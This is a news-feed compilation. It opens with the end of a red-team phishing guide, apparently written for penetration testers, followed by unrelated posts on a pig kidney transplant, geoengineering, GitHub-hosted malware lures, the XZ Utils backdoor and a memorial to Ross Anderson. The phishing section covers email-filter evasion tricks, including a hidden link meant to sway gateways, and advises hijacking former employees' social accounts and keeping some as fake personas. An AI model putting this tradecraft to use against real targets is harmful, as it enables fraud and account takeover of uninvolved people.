This script is insanely easy to install and use, and will generally get you a nice static site clone within minutes when paired with Nginx, Apache, etc. Keep in mind that you may want to manually modify site content that might still be under copyright or trademark from the prior owner.
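Usage is about as simple as it gets (the domain is a placeholder):

    gem install wayback_machine_downloader
    wayback_machine_downloader https://expired-example.com --directory ./site

The pages land in ./site, ready to be served by a static web server.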

Social Media Account Bonus

For expired sites you’ve bought, have you ever set up a mail server and monitored for incoming emails? I have! And the results can be fascinating. What you might find is that the domain you just bought used to belong to a functioning company, and some of that company’s employees used their work email to sign up for services like social media sites. Now, the company went under, those employees don’t have access to their former work email, but you do. Once again, I need to stress that this is a legal gray area, so do what you can to give these people back their accounts, and change PII on any others you decide to keep as catphish accounts.

General Tips for any Domain

Send Some ‘Safe’ Emails First

Some SEGs will block emails from domains they have never seen before regardless of reputation. Therefore, it’s generally a good idea to send some completely benign emails with your new domain before you send out any phishing pretexts. You can address these to the ‘info@’ or similar generic mailboxes and keep the messages vague to hopefully go unnoticed/ignored by any humans on the other end. We’re just trying to prime the SEG to make a determination that emails from our domain are safe and should be allowed in the future. I’ve also heard that adding hidden links to emails with HREFs that point to your domain will also work against some SEGs, though I have not personally experimented with this technique.
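If you want to experiment with that second technique, the hidden link might look something like this in an otherwise benign HTML email (the domain is a placeholder; treat this as an untested sketch):

    <a href="https://our-new-domain.com/welcome" style="display:none">&nbsp;</a>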

Use Sendgrid, MailChimp, etc.

These services specialize in mass email delivery for their clients. They work tirelessly to keep their email servers off of block lists and help marketers deliver phishing campaigns… ahem I mean ‘advertisements’ to their targets… oops I mean ‘leads’. Once again, marketing tools are your friend when cold emailing. Keep in mind that these services don’t appreciate scammers and spammers like you, so don’t be surprised if you get too aggressive with your phishing and your account gets blocked. Yet another argument for keeping campaigns small and targeted.

Use your Registrar’s Email Service

Most domain registrars also offer hosting and email services. Some even provide a few mailboxes for free! Similar to email sending services, your registrar’s mail servers will often be delivering tons of legitimate messages for other customers and therefore have a good reputation from an IP perspective. If you take this route, be sure to let the registrar know that you are a penetration tester and which domains you will be using for what campaigns. Most I’ve worked with have an abuse email address and will honor your use case.

Use Gmail for the Long Con

Personal emails are often a blind spot for corporate email filters. Completely blocking inbound emails from Gmail, Yahoo, Outlook, etc. is a tough pill to swallow and most network administrators decide to allow them instead of answering constant requests from employees to put in an exception for this or that sender. In addition, it’s extremely difficult to apply reputation scores to individual senders. Therefore, if you can think of a pretext that would make sense to come from a Gmail account, you have a high probability of at least bypassing domain reputation checks. This can work really well for individualized campaigns where you actually have a back-and-forth conversation with the targets before link/payload delivery.

Set Up SPF, DKIM, and DMARC

For sending domains you own, it will always work in your favor to set up email security settings. Check the API documentation for your registrar and write a script to set these DNS settings.
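As a rough sketch, the records you end up publishing look something like this (the domain, selector, IP, and key are placeholders):

    phish-example.com.                TXT  "v=spf1 ip4:203.0.113.10 -all"
    _dmarc.phish-example.com.         TXT  "v=DMARC1; p=none; rua=mailto:dmarc@phish-example.com"
    s1._domainkey.phish-example.com.  TXT  "v=DKIM1; k=rsa; p=<base64-encoded-public-key>"

DKIM also requires your mail server or sending service to sign outgoing messages with the matching private key; the DNS record alone is not enough.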

Read the Logs!

When you do start sending emails with a domain, make sure to watch your SMTP logs carefully. They are often extremely helpful for identifying whether your messages are being blocked for reasons you control. For example, I know Mimecast will frequently block emails from new senders that it hasn't seen before, but will respond with a very helpful message explaining how to get off their 'gray list'. The solution is simply to resend the email within the next 24 hours. If you aren't watching the logs, you'll stay blocked when you could easily have gotten your email delivered.

Parting Wisdom

“What I recalled of Sunday School was that the more difficult something became, the more rewarding it was in the end.” — Big Phish


One Phish Two Phish, Red Teams Spew Phish was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

The post One Phish Two Phish, Red Teams Spew Phish appeared first on Security Boulevard.

Transplanted Pig Kidney Is Removed From Patient

4 June 2024 at 13:41
The organ, from a genetically modified animal, failed because of a lack of blood flow, surgeons said, but did not appear to have been rejected by the body.

© Shelby Lum/Associated Press

Lisa Pisano looked at photos of her dog after receiving a pig kidney transplant at the NYU Langone Health in New York in April.

Using Scary but Fun Stories to Aid Cybersecurity Training – Source: securityboulevard.com


Source: securityboulevard.com – Author: Steve Winterfeld Security experts have many fun arguments about our field. For example, while I believe War Games is the best hacker movie, opinions vary based on age and generation. Other never-ending debates include what the best hack is, the best operating system (though this is more of a religious debate), […]

La entrada Using Scary but Fun Stories to Aid Cybersecurity Training – Source: securityboulevard.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

Black Basta Ransomware Attack: Microsoft Quick Assist Flaw – Source: securityboulevard.com


Source: securityboulevard.com – Author: Wajahat Raja Recent reports claim that the Microsoft Threat Intelligence team stated that a cybercriminal group, identified as Storm-1811, has been exploiting Microsoft’s Quick Assist tool in a series of social engineering attacks. This group is known for deploying the Black Basta ransomware attack. On May 15, 2024, Microsoft released details […]

La entrada Black Basta Ransomware Attack: Microsoft Quick Assist Flaw – Source: securityboulevard.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

Alameda Officials Stop Cloud Brightening Study Aimed at Cooling Planet

14 May 2024 at 06:30
Researchers had been testing a sprayer that could one day be used to push a salty mist skyward, cooling the Earth. Officials stopped the work, citing health questions.

© Ian C. Bates for The New York Times

The experiment, designed to test possible cloud-brightening technology, took place aboard a ship docked in San Francisco Bay.

Why new proposals to restrict geoengineering are misguided

23 April 2024 at 06:00

The public debate over whether we should consider intentionally altering the climate system is heating up, as the dangers of climate instability rise and more groups look to study technologies that could cool the planet.

Such interventions, commonly known as solar geoengineering, may include releasing sulfur dioxide in the stratosphere to cast away more sunlight, or spraying salt particles along coastlines to create denser, more reflective marine clouds.  

The growing interest in studying the potential of these tools, particularly through small-scale outdoor experiments, has triggered corresponding calls to shut down the research field, or at least to restrict it more tightly. But such rules would halt or hinder scientific exploration of technologies that could save lives and ease suffering as global warming accelerates—and they might also be far harder to define and implement than their proponents appreciate.

Earlier this month, Tennessee’s governor signed into law a bill banning the “intentional injection, release, or dispersion” of chemicals into the atmosphere for the “express purpose of affecting temperature, weather, or the intensity of the sunlight.” The legislation seems to have been primarily motivated by debunked conspiracy theories about chemtrails. 

Meanwhile, at the March meeting of the United Nations Environmental Agency, a bloc of African nations called for a resolution that would establish a moratorium, if not a ban, on all geoengineering activities, including outdoor tests. Mexican officials have also proposed restrictions on experiments within their boundaries.

To be clear, I’m not a disinterested observer but a climate researcher focused on solar geoengineering and coordinating international modeling studies on the issue. As I stated in a letter I coauthored last year, I believe that it’s important to conduct more research on these technologies because it might significantly reduce certain climatic risks. 

This doesn’t mean I support unilateral efforts today, or forging ahead in this space without broader societal engagement and consent. But some of these proposed restrictions on solar geoengineering leave vague what would constitute an acceptable, “small” test as opposed to an unacceptable “intervention.” Such vagueness is problematic, and its potential consequences would have far more reach than the well-intentioned proponents of regulation might wish for.

Consider the “intentional” standard of the Tennessee bill. While it is true that the intentionality of any such effort matters, defining it is tough. If knowing that an activity will affect the atmosphere is enough for it to be considered geoengineering, even driving a car—since you know its emissions warm up the climate—could fall under the banner. Or, to pick an example operating on a much larger scale, a utility might run afoul of the bill, since operating a power plant produces both carbon dioxide that warms up the planet and sulfur dioxide pollution that can exert a cooling effect.

Indeed, a single coal-fired plant can pump out more than 40,000 tons of the latter gas a year, dwarfing the few kilograms proposed for some stratospheric experiments. That includes the Harvard project recently scrapped in light of concerns from environmental and Indigenous groups. 

Of course, one might say that in all those other cases, the climate-altering impact of emissions is only a side effect of another activity (going somewhere, producing energy, having fun). But then, outdoor tests of solar geoengineering can be framed as efforts to gain further knowledge for societal or scientific benefit. More stringent regulations suggest that, of all intentional activities, it is those focused on knowledge-seeking that need to be subjected to the highest scrutiny—while joyrides, international flights, or bitcoin mining are all fine.

There could be similar challenges even with more modest proposals to require greater transparency around geoengineering research. In a submission to federal officials in March, a group of scholars suggested, among other sensible updates, that any group proposing to conduct outdoor research on weather modification anywhere in the world should have to notify the National Oceanic and Atmospheric Administration in advance.

But creating a standard that would require notifications from anyone, anywhere who “foreseeably or intentionally seeks to cause effects within the United States” could be taken to mean that nations can’t modify any kind of emissions (or convert forests to farmland) before consulting with other countries. For instance, in 2020, the International Maritime Organization introduced rules that cut sulfate emissions from the shipping sector by more than 80%, all at once. The benefits for air quality and human health are pretty clear, but research also suggested that the change would unmask additional global warming, because such pollution can reflect away sunlight either directly or by producing clouds. Would this qualify?

It is worth noting that both those clamoring for more regulations and those bristling to just go out and “do something” claim to have, as their guiding principle, a genuine concern for the climate and human welfare. But again, this does not necessarily justify a “Ban first—ask questions later” approach,  just as it doesn’t justify “Do something first—ask permission later.” 

Those demanding bans are right in saying that there are risks in geoengineering. Those include potential side effects in certain parts of the world—possibilities that need to be better studied—as well as vexing questions about how the technology could be fairly and responsibly governed in a fractured world that’s full of competing interests.

The more recent entrance of venture-backed companies into the field, selling dubious cooling credits or playing up their “proprietary particles,” certainly isn’t helping its reputation with a public that’s rightly wary of how profit motives could influence the use of technologies with the power to alter the entire planet’s climate. Nor is the risk that rogue actors will take it upon themselves to carry out these sorts of interventions. 

But burdensome regulation isn’t guaranteed to deter bad actors. If anything, they’ll just go work in the shadows. It is, however, a surefire way to discourage responsible researchers from engaging in the field. 

All those concerned about “meddling with the climate” should be in favor of open, public, science-informed strategies to talk more, not less, about geoengineering, and to foster transparent research across disciplines. And yes, this will include not just “harmless” modeling studies but also outdoor tests to understand the feasibility of such approaches and narrow down uncertainties. There’s really no way around that. 

In environmental sciences, tests involving dispersing substances are already performed for many other reasons, as long as they’re deemed safe by some reasonable standard. Similar experiments aimed at better understanding solar geoengineering should not be treated differently just because some people (but certainly not all of them) object on moral or environmental grounds. In fact, we should forcefully defend such experiments both because freedom of research is a worthy principle and because more information leads to better decision-making.

At the same time, scientists can’t ignore all the concerns and fears of the general public. We need to build more trust around solar geoengineering research and confidence in researchers. And we must encourage people to consider the issue from multiple perspectives and in relation to the rising risks of climate change.

This can be done, in part, through thoughtful scientific oversight efforts that aim to steer research toward beneficial outcomes by fostering transparency, international collaborations, and public engagement without imposing excessive burdens and blanket prohibitions.

Yes, this issue is complicated. Solar geoengineering may present risks and unknowns, and it raises profound, sometimes uncomfortable questions about humanity’s role in nature. 

But we also know for sure that we are the cause of climate change—and that it is exacerbating the dangers of heat waves, wildfires, flooding, famines, and storms that will inflict human suffering on staggering scales. If there are possible interventions that could limit that death and destruction, we have an obligation to evaluate them carefully, and to weigh any trade-offs with open and informed minds. 

Daniele Visioni is a climate scientist and assistant professor at Cornell University.

Using Legitimate GitHub URLs for Malware

22 April 2024 at 11:26

Interesting social-engineering attack vector:

McAfee released a report on a new LUA malware loader distributed through what appeared to be a legitimate Microsoft GitHub repository for the “C++ Library Manager for Windows, Linux, and MacOS,” known as vcpkg.

The attacker is exploiting a property of GitHub: comments to a particular repo can contain files, and those files will be associated with the project in the URL.

What this means is that someone can upload malware and “attach” it to a legitimate and trusted project.

As the file’s URL contains the name of the repository the comment was created in, and as almost every software company uses GitHub, this flaw can allow threat actors to develop extraordinarily crafty and trustworthy lures.

For example, a threat actor could upload a malware executable in NVIDIA’s driver installer repo that pretends to be a new driver fixing issues in a popular game. Or a threat actor could upload a file in a comment to the Google Chromium source code and pretend it’s a new test version of the web browser.

These URLs would also appear to belong to the company’s repositories, making them far more trustworthy.

Other Attempts to Take Over Open Source Projects

18 April 2024 at 07:06

After the XZ Utils discovery, people have been examining other open-source projects. Surprising no one, the incident is not unique:

The OpenJS Foundation Cross Project Council received a suspicious series of emails with similar messages, bearing different names and overlapping GitHub-associated emails. These emails implored OpenJS to take action to update one of its popular JavaScript projects to “address any critical vulnerabilities,” yet cited no specifics. The email author(s) wanted OpenJS to designate them as a new maintainer of the project despite having little prior involvement. This approach bears strong resemblance to the manner in which “Jia Tan” positioned themselves in the XZ/liblzma backdoor.

[…]

The OpenJS team also recognized a similar suspicious pattern in two other popular JavaScript projects not hosted by its Foundation, and immediately flagged the potential security concerns to respective OpenJS leaders, and the Cybersecurity and Infrastructure Security Agency (CISA) within the United States Department of Homeland Security (DHS).

The article includes a list of suspicious patterns, and another list of security best practices.

Backdoor in XZ Utils That Almost Happened

11 April 2024 at 07:01

Last week, the Internet dodged a major nation-state attack that would have had catastrophic cybersecurity repercussions worldwide. It’s a catastrophe that didn’t happen, so it won’t get much attention—but it should. There’s an important moral to the story of the attack and its discovery: The security of the global Internet depends on countless obscure pieces of software written and maintained by even more obscure unpaid, distractible, and sometimes vulnerable volunteers. It’s an untenable situation, and one that is being exploited by malicious actors. Yet precious little is being done to remedy it.

Programmers dislike doing extra work. If they can find already-written code that does what they want, they’re going to use it rather than recreate the functionality. These code repositories, called libraries, are hosted on sites like GitHub. There are libraries for everything: displaying objects in 3D, spell-checking, performing complex mathematics, managing an e-commerce shopping cart, moving files around the Internet—everything. Libraries are essential to modern programming; they’re the building blocks of complex software. The modularity they provide makes software projects tractable. Everything you use contains dozens of these libraries: some commercial, some open source and freely available. They are essential to the functionality of the finished software. And to its security.

You’ve likely never heard of an open-source library called XZ Utils, but it’s on hundreds of millions of computers. It’s probably on yours. It’s certainly in whatever corporate or organizational network you use. It’s a freely available library that does data compression. It’s important, in the same way that hundreds of other similar obscure libraries are important.

Many open-source libraries, like XZ Utils, are maintained by volunteers. In the case of XZ Utils, it’s one person, named Lasse Collin. He has been in charge of XZ Utils since he wrote it in 2009. And, at least in 2022, he’s had some “longterm mental health issues.” (To be clear, he is not to blame in this story. This is a systems problem.)

Beginning in at least 2021, Collin was personally targeted. We don’t know by whom, but we have account names: Jia Tan, Jigar Kumar, Dennis Ens. They’re not real names. They pressured Collin to transfer control over XZ Utils. In early 2023, they succeeded. Tan spent the year slowly incorporating a backdoor into XZ Utils: disabling systems that might discover his actions, laying the groundwork, and finally adding the complete backdoor earlier this year. On March 25, Hans Jansen—another fake name—tried to push the various Unix systems to upgrade to the new version of XZ Utils.

And everyone was poised to do so. It’s a routine update. In the span of a few weeks, it would have been part of both Debian and Red Hat Linux, which run on the vast majority of servers on the Internet. But on March 29, another unpaid volunteer, Andres Freund—a real person who works for Microsoft but who was doing this in his spare time—noticed something weird about how much processing the new version of XZ Utils was doing. It’s the sort of thing that could be easily overlooked, and even more easily ignored. But for whatever reason, Freund tracked down the weirdness and discovered the backdoor.

It’s a masterful piece of work. It affects the SSH remote login protocol, basically by adding a hidden piece of functionality that requires a specific key to enable. Someone with that key can use the backdoored SSH to upload and execute an arbitrary piece of code on the target machine. SSH runs as root, so that code could have done anything. Let your imagination run wild.

This isn’t something a hacker just whips up. This backdoor is the result of a years-long engineering effort. The ways the code evades detection in source form, how it lies dormant and undetectable until activated, and its immense power and flexibility give credence to the widely held assumption that a major nation-state is behind this.

If it hadn’t been discovered, it probably would have eventually ended up on every computer and server on the Internet. Though it’s unclear whether the backdoor would have affected Windows and macOS, it would have worked on Linux. Remember in 2020, when Russia planted a backdoor into SolarWinds that affected 14,000 networks? That seemed like a lot, but this would have been orders of magnitude more damaging. And again, the catastrophe was averted only because a volunteer stumbled on it. And it was possible in the first place only because the first unpaid volunteer, someone who turned out to be a national security single point of failure, was personally targeted and exploited by a foreign actor.

This is no way to run critical national infrastructure. And yet, here we are. This was an attack on our software supply chain. This attack subverted software dependencies. The SolarWinds attack targeted the update process. Other attacks target system design, development, and deployment. Such attacks are becoming increasingly common and effective, and also are increasingly the weapon of choice of nation-states.

It’s impossible to count how many of these single points of failure are in our computer systems. And there’s no way to know how many of the unpaid and unappreciated maintainers of critical software libraries are vulnerable to pressure. (Again, don’t blame them. Blame the industry that is happy to exploit their unpaid labor.) Or how many more have accidentally created exploitable vulnerabilities. How many other coercion attempts are ongoing? A dozen? A hundred? It seems impossible that the XZ Utils operation was a unique instance.

Solutions are hard. Banning open source won’t work; it’s precisely because XZ Utils is open source that an engineer discovered the problem in time. Banning software libraries won’t work, either; modern software can’t function without them. For years, security engineers have been pushing something called a “software bill of materials”: an ingredients list of sorts so that when one of these packages is compromised, network owners at least know if they’re vulnerable. The industry hates this idea and has been fighting it for years, but perhaps the tide is turning.

The fundamental problem is that tech companies dislike spending extra money even more than programmers dislike doing extra work. If there’s free software out there, they are going to use it—and they’re not going to do much in-house security testing. Easier software development equals lower costs equals more profits. The market economy rewards this sort of insecurity.

We need some sustainable ways to fund open-source projects that become de facto critical infrastructure. Public shaming can help here. The Open Source Security Foundation (OSSF), founded in 2022 after another critical vulnerability in an open-source library—Log4j—was discovered, addresses this problem. The big tech companies pledged $30 million in funding after the critical Log4j supply chain vulnerability, but they never delivered. And they are still happy to make use of all this free labor and free resources, as a recent Microsoft anecdote indicates. The companies benefiting from these freely available libraries need to actually step up, and the government can force them to.

There’s a lot of tech that could be applied to this problem, if corporations were willing to spend the money. Liabilities will help. The Cybersecurity and Infrastructure Security Agency’s (CISA’s) “secure by design” initiative will help, and CISA is finally partnering with OSSF on this problem. Certainly the security of these libraries needs to be part of any broad government cybersecurity initiative.

We got extraordinarily lucky this time, but maybe we can learn from the catastrophe that didn’t happen. Like the power grid, communications network, and transportation systems, the software supply chain is critical infrastructure, part of national security, and vulnerable to foreign attack. The US government needs to recognize this as a national security problem and start treating it as such.

This essay originally appeared in Lawfare.

In Memoriam: Ross Anderson, 1956–2024

10 April 2024 at 07:08

Last week, I posted a short memorial of Ross Anderson. The Communications of the ACM asked me to expand it. Here’s the longer version.

EDITED TO ADD (4/11): Two weeks before he passed away, Ross gave an 80-minute interview where he told his life story.

XZ Utils Backdoor

2 April 2024 at 14:50

The cybersecurity world got really lucky last week. An intentionally placed backdoor in XZ Utils, an open-source compression utility, was pretty much accidentally discovered by a Microsoft engineer—weeks before it would have been incorporated into both Debian and Red Hat Linux. From Ars Technica:

Malicious code added to XZ Utils versions 5.6.0 and 5.6.1 modified the way the software functions. The backdoor manipulated sshd, the executable file used to make remote SSH connections. Anyone in possession of a predetermined encryption key could stash any code of their choice in an SSH login certificate, upload it, and execute it on the backdoored device. No one has actually seen code uploaded, so it’s not known what code the attacker planned to run. In theory, the code could allow for just about anything, including stealing encryption keys or installing malware.

It was an incredibly complex backdoor. Installing it was a multi-year process that seems to have involved social engineering the lone unpaid engineer in charge of the utility. More from Ars Technica:

In 2021, someone with the username JiaT75 made their first known commit to an open source project. In retrospect, the change to the libarchive project is suspicious, because it replaced the safe_fprint function with a variant that has long been recognized as less secure. No one noticed at the time.

The following year, JiaT75 submitted a patch over the XZ Utils mailing list, and, almost immediately, a never-before-seen participant named Jigar Kumar joined the discussion and argued that Lasse Collin, the longtime maintainer of XZ Utils, hadn’t been updating the software often or fast enough. Kumar, with the support of Dennis Ens and several other people who had never had a presence on the list, pressured Collin to bring on an additional developer to maintain the project.

There’s a lot more. The sophistication of both the exploit and the process to get it into the software project scream nation-state operation. It’s reminiscent of Solar Winds, although (1) it would have been much, much worse, and (2) we got really, really lucky.

I simply don’t believe this was the only attempt to slip a backdoor into a critical piece of Internet software, either closed source or open source. Given how lucky we were to detect this one, I believe this kind of operation has been successful in the past. We simply have to stop building our critical national infrastructure on top of random software libraries managed by lone unpaid distracted—or worse—individuals.

Ross Anderson

31 March 2024 at 20:21

Ross Anderson unexpectedly passed away Thursday night in, I believe, his home in Cambridge.

I can’t remember when I first met Ross. Of course it was before 2008, when we created the Security and Human Behavior workshop. It was well before 2001, when we created the Workshop on Economics and Information Security. (Okay, he created both—I helped.) It was before 1998, when we wrote about the problems with key escrow systems. I was one of the people he brought to the Newton Institute, at Cambridge University, for the six-month cryptography residency program he ran (I mistakenly didn’t stay the whole time)—that was in 1996.

I know I was at the first Fast Software Encryption workshop in December 1993, another conference he created. There I presented the Blowfish encryption algorithm. Pulling an old first-edition of Applied Cryptography (the one with the blue cover) down from the shelf, I see his name in the acknowledgments. Which means that sometime in early 1993—probably at Eurocrypt in Lofthus, Norway—I, as an unpublished book author who had only written a couple of crypto articles for Dr. Dobb’s Journal, asked him to read and comment on my book manuscript. And he said yes. Which means I mailed him a paper copy. And he read it. And mailed his handwritten comments back to me. In an envelope with stamps. Because that’s how we did it back then.

I have known Ross for over thirty years, as both a colleague and a friend. He was enthusiastic, brilliant, opinionated, articulate, curmudgeonly, and kind. Pick up any of his academic papers—there are many—and odds are that you will find at least one unexpected insight. He was a cryptographer and security engineer, but also very much a generalist. He published on block cipher cryptanalysis in the 1990s, and the security of large-language models last year. He started conferences like nobody’s business. His masterwork book, Security Engineering—now in its third edition—is as comprehensive a tome on cybersecurity and related topics as you could imagine. (Also note his fifteen-lecture video series on that same page. If you have never heard Ross lecture, you’re in for a treat.) He was the first person to understand that security problems are often actually economic problems. He was the first person to make a lot of those sorts of connections. He fought against surveillance and backdoors, and for academic freedom. He didn’t suffer fools in either government or the corporate world.

He’s listed in the acknowledgments as a reader of every one of my books from Beyond Fear on. Recently, we’d see each other a couple of times a year: at this or that workshop or event. The last time I saw him was last June, at SHB 2023, in Pittsburgh. We were having dinner on Alessandro Acquisti‘s rooftop patio, celebrating another successful workshop. He was going to attend my Workshop on Reimagining Democracy in December, but he had to cancel at the last minute. (He sent me the talk he was going to give. I will see about posting it.) The day before he died, we were discussing how to accommodate everyone who registered for this year’s SHB workshop. I learned something from him every single time we talked. And I am not the only one.

My heart goes out to his wife Shireen and his family. We lost him much too soon.

EDITED TO ADD (4/10): I wrote a longer version for Communications of the ACM.
